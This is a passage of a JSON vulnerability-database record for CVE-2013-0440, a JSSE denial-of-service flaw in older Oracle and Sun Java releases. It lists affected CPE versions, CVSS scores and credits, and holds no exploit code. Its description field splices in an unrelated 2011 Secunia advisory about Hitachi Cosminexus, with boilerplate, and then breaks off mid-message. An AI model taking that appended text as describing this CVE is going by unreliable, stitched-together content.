"cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_26:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_27:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_24:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_25:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_37:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_29:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_36:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_35:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_28:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.4.2_40", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_23:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_34:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_33:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.4.2_38:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.4.2_40", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_26:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_29:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_33:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_25:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_23:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_36:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_28:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_35:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_34:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.4.2_38:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_37:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_27:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.4.2_7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-0440" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "120166" }, { "db": "PACKETSTORM", "id": "120735" }, { "db": "PACKETSTORM", "id": "120167" } ], "trust": 0.5 }, "cve": "CVE-2013-0440", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2013-0440", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-0440", "trust": 1.0, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2013-0440", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-0440" }, { "db": "NVD", "id": "CVE-2013-0440" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, 5.0 through Update 38, and 1.4.2_40 and earlier, and OpenJDK 7, allows remote attackers to affect availability via vectors related to JSSE. NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to CPU consumption in the SSL/TLS implementation via a large number of ClientHello packets that are not properly handled by (1) ClientHandshaker.java and (2) ServerHandshaker.java. \nThe vulnerability can be exploited over the \u0027SSL/TLS\u0027 protocol. This issue affects the \u0027JSSE\u0027 sub-component. In a typical operating environment, these are of low security risk as\nthe runtime is not used on untrusted applets. ----------------------------------------------------------------------\n\n\nGet a tax break on purchases of Secunia Solutions!\n\nIf you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:\nhttp://secunia.com/products/corporate/vim/section_179/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nHitachi Cosminexus Products Java Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA43627\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/43627/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43627\n\nRELEASE DATE:\n2011-03-08\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/43627/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/43627/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43627\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nHitachi has acknowledged some vulnerabilities in Hitachi Cosminexus\nproducts, which can be exploited by malicious people to disclose\npotentially sensitive information, manipulate certain data, cause a\nDoS (Denial of Service), and compromise a vulnerable system. \n\nThe vulnerabilities are caused due to vulnerabilities in the bundled\nversion of Cosminexus Developer\u0027s Kit for Java. \n\nFor more information:\nSA43262\n\nPlease see the vendor\u0027s advisory for a full list of affected\nproducts. \n\nSOLUTION:\nUpdate to a fixed version. Please see vendor advisory for more\ndetails. \n\nORIGINAL ADVISORY:\nHitachi (English):\nhttp://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS11-003/index.html\n\nHitachi (Japanese):\nhttp://www.hitachi.co.jp/Prod/comp/soft1/security/info/./vuls/HS11-003/index.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available 